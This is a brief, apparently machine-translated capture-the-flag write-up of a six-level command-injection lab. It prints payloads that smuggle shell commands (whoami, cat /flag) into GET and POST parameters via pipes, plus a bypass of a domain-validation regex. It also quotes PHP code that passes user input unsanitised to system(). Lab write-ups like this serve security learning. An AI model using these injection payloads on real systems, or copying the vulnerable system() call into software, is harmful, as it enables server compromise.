first round
Directly followed by ?cmd=whoami, you can see that the command is executed successfully
You can see www-data ;
You can know that this is the Ubuntu server used, and you can view the information you want according to the service directory
Of course, you can check the version information
Can you check if there is a flag:
It can be found directly, probably because the first level is relatively simple
second pass
Same as the previous question, you need to pass parameters, but this time it is POST parameter passing
third pass
It is not the same as the previous question, there is whois, I will go around and have a look
Add ?domain=baidu.com|whoami at the end, you can see that the command is executed successfully
fourth level
Then change POST to domain=baidu.com|cat /flag
Fifth pass
if (preg_match('/^[-a-z0-9]+\.a[cdefgilmnoqrstuwxz]|
b[abdefghijmnorstvwyz]|
c[acdfghiklmnoruvxyz]|
d[ejkmoz]|
e[cegrstu]|
f[ijkmor]|
g[abdefghilmnpqrstuwy]|
h[kmnrtu]|
i[delmnoqrst]|
j[emop]|
k[eghimnprwyz]|
l[abcikrstuvy]|
m[acdeghklmnopqrstuvwxyz]|
n[acefgilopruz]|
om|p[aefghklmnrstwy]|
qa|r[eosuw]|
s[abcdeghijklmnortuvyz]|
t[cdfghjklmnoprtvwz]|
u[agksyz]|v[aceginu]|
w[fs]|
y[and]|
z[amw]|
biz|cat|com|edu|gov|int|mil|net|org|pro|tel|aero|arpa|asia|coop|info|jobs|mobi|name|museum|travel|arpa|xn--[a-z0-9]+$/', strtolower($_GET["domain"])))
{ system("whois -h " . $_GET["server"] . " " . $_GET["domain"]); }
else
{echo "malformed domain name";}
There are regular expressions here, which are really long. After studying the sentences, try to apply them layer by layer
?domain=baidu.com&server=127.0.0.1|whoami||baidu.com
and then, and then
http://ip/CMD-5/?domain=baidu.com&server=127.0.0.1|cat%20/flag||baidu.com
Sixth hurdle
Change the get injection of the fifth level to POST injection
The cmd shooting range is completed